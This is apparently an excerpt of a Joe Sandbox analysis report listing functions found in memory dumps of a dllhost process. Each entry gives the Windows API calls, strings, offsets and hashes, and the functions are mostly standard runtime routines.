GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001C0402028DF), ref: 000001C040202A12

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: 2032a7538bf20b56707928b3f059611d22abaecf3473b389c3a60300ca756ae2
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 3A91A932650765C9FB6ADF659A90BEE2BA0B35CB8CF544107DF4A77AC5DA34C48AC300

Function 000001C0401D28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001C0401D28DF), ref: 000001C0401D2A12

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: caea053fdd14f9712b47b2e6220ded45bc440f22397c61b796fae019fa436cbc
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: 4B91CE32650651C9FB6ACF659450BEE2BA0FB6CF8CF444106DF5B73AA5DA38E486C300

Function 000001C0401F8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001C0401F80BC
GetCurrentThreadId.KERNEL32 ref: 000001C0401F80CA
GetCurrentProcessId.KERNEL32 ref: 000001C0401F80D6
QueryPerformanceCounter.KERNEL32 ref: 000001C0401F80E6

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 097bdb6190f555a5fdb081048b24676149338c4dbe283e7a2b1e06a1896c2bf3
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: AA111536750F15CAFB00DB60E8947AA33A4F71DB58F440E21EB6D967A4DB78C1588340

Function 000001C0401C8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000001C0401C80BC
GetCurrentThreadId.KERNEL32 ref: 000001C0401C80CA
GetCurrentProcessId.KERNEL32 ref: 000001C0401C80D6
QueryPerformanceCounter.KERNEL32 ref: 000001C0401C80E6

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 0bb19c70c590c3dfcc79a9db6fef0f6c56f456817b39f658926a32e8a66d37ba
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: 38111836750B04CAFB01DF60E8547AA33A4F71DB58F440E21EF6E96BA4DB78D1988380

Function 000001C0401F27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001C0401F28CC
StrCpyW.SHLWAPI ref: 000001C0401F28E5

Part of subcall function 000001C0401F3F88: StrCmpNIW.SHLWAPI(?,?,?,000001C0401F272F), ref: 000001C0401F3FA0

Strings

\\.\pipe\, xrefs: 000001C0401F28D7

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: 0d07e5c84707d22738f97a56b05cff87be6c8221fad0624e0712033ec8064ab4
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: AE718F76290B93C1F63ADE669954BEB7794F389B88F400016DF0B63BA9DA75C5048740

Function 000001C0401C27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001C0401C28CC
StrCpyW.SHLWAPI ref: 000001C0401C28E5

Part of subcall function 000001C0401C3F88: StrCmpNIW.SHLWAPI(?,?,?,000001C0401C272F), ref: 000001C0401C3FA0

Strings

\\.\pipe\, xrefs: 000001C0401C28D7

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: a31da691b411d30905d786676d390117ca7db311804687b837258b35ad70883f
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: 9F717F762C8B92C2F67ADE269854BEB6794F38DF88F440016DF0B63BA8DE35C5008740

Function 000001C03F6E80A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001C03F6E80CB
_IsNonwritableInCurrentImage.LIBCMT ref: 000001C03F6E8162

Strings

csm, xrefs: 000001C03F6E8149

Memory Dump Source

Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 2c9bbc8802d9159b98ee9def374c70320720cd75d9f40c6dd554d1d108dbdc8a
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 0451D13B351A80CEFB56CB25E744FAC3399F368B88F15A169DA8647788D778C841C780

Function 000001C03F6E9AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

_CallSETranslator.LIBVCRUNTIME ref: 000001C03F6E9BA7

Strings

MOC, xrefs: 000001C03F6E9B6F
RCC, xrefs: 000001C03F6E9B77

Memory Dump Source

Source File: 00000028.00000003.2319649635.000001C03F6E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001C03F6E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_1c03f6e0000_dllhost.jbxd

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 0e060dc762f5e3f8775b1a04d57c94e3d1dc74353e12b05f0e37beb2ad9b6f5a
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: C0619037604BC4C9EB229B15E540BDEB7A4FB99B94F046259EBC807B99DB78C090CB00

Function 000001C0401F25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001C0401F26C2
StrCpyW.SHLWAPI ref: 000001C0401F26D9

Strings

\\.\pipe\, xrefs: 000001C0401F26CD

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: af75e30e7e614401a4ec43e2df3ef741adbed1ec77e5819ec6d48bf23bf31e40
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 24510936284B82C1F62EEE25A454BEB7751F3ADF88F540225DF5B63BA9DA35C404C740

Function 000001C0401C25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001C0401C26C2
StrCpyW.SHLWAPI ref: 000001C0401C26D9

Strings

\\.\pipe\, xrefs: 000001C0401C26CD

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: d9f7eb43392b306edf32a056ad3027294a44d15c505acb2bc3725628eb6edf24
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: F351A2362C8781C3F62ADA29A494BEB7661F7ADF88F540025DF5B63BA9DA35C404C740

Function 000001C040202660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001C040202778
GetLastError.KERNEL32 ref: 000001C04020279D

Strings

U, xrefs: 000001C040202722

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: dfc14aad8214c9a8f38ab36e648d867354dd8c62520f10bc722b3d7eb3eede05
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: E041AE32625B80C6EB65DF25E544BDBA7A4F38C788F804122EB4D97798EB78C445CB40

Function 000001C0401D2660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001C0401D2778
GetLastError.KERNEL32 ref: 000001C0401D279D

Strings

U, xrefs: 000001C0401D2722

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: 8d5bd57d1eea467ecfeb950ad8b89cd0f463b33d7f7464b97194cdf31e3de368
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: D241BF32625A80C6F725DF65E444BDAB7A0F7ACB88F844121EF4E97768EB78D441CB40

Function 000001C0401F9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001C0401F91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001C0401F87F7), ref: 000001C0401F9209

Strings

csm, xrefs: 000001C0401F91F6

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: c52003565e5b47ad038ec3da5cea037b6df3463791391a9e581ee3c4cc9102ce
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 12111932218B85C2EB26DF15E54469AB7E5F788B98F584221EF8D17BA4DF38C551CB00

Function 000001C0401C9178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001C0401C91C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001C0401C87F7), ref: 000001C0401C9209

Strings

csm, xrefs: 000001C0401C91F6

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 5961cbf7a0f5123faccfa41641397832dee8dca8839ef5bd5435f19609288f20
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 8311EC32658B80C2FB66CF15E44469A77E5FB88F98F584225DB8E17B64DF38C551CB00

Function 00000001400020CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

ntdll.dll, xrefs: 00000001400020D2

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318

Function 000001C0401F1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C0401F1D69
HeapAlloc.KERNEL32 ref: 000001C0401F1D77
GetProcessHeap.KERNEL32 ref: 000001C0401F1D9C
HeapFree.KERNEL32 ref: 000001C0401F1DAA

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 511ae7f1bfe6ac0eced33f1496e4733a0a59bb04f35d17ded6192c02331485db
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 1A115B31A41B91C5FA1ADB66A80869AA7B0F7CDFD4F584124DF4E63775EF38D4428300

Function 000001C0401C1D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C0401C1D69
HeapAlloc.KERNEL32 ref: 000001C0401C1D77
GetProcessHeap.KERNEL32 ref: 000001C0401C1D9C
HeapFree.KERNEL32 ref: 000001C0401C1DAA

Memory Dump Source

Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true

Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 409764778b63da25329ba2e67f453f64ed5c404d0a381d5246cfc22f21ec8a00
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: 6F113931A85B80D5FA1ADB66A80869A67A0FBCDFD5F584124DF4F63775EE38D4428300

Function 0000000140001220 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001226
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001235
GetProcessHeap.KERNEL32(?,?,00000000,0000000140001544), ref: 000000014000124F
HeapAlloc.KERNEL32(?,?,00000000,0000000140001544), ref: 0000000140001260

Memory Dump Source

Source File: 00000028.00000002.2673229610.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000028.00000002.2672435865.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674116081.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2674989251.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90

Function 000001C0401F1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C0401F126A
HeapAlloc.KERNEL32 ref: 000001C0401F1279
GetProcessHeap.KERNEL32 ref: 000001C0401F1293
HeapAlloc.KERNEL32 ref: 000001C0401F12A4

Memory Dump Source

Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true

Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: e40ef41b61536b98298d55cb467abd74c8a6d0409dce86de8114d1d976e9cb85
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 88E03931641615DAF719EB62D8087AAB6E1EB8DB09F848024CB0907790EF7DC4998740

Function 000001C0401C1264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001C0401C126A
HeapAlloc.KERNEL32 ref: 000001C0401C1279
GetProcessHeap.KERNEL32 ref: 000001C0401C1293
HeapAlloc.KERNEL32 ref: 000001C0401C12A4

Memory Dump Source

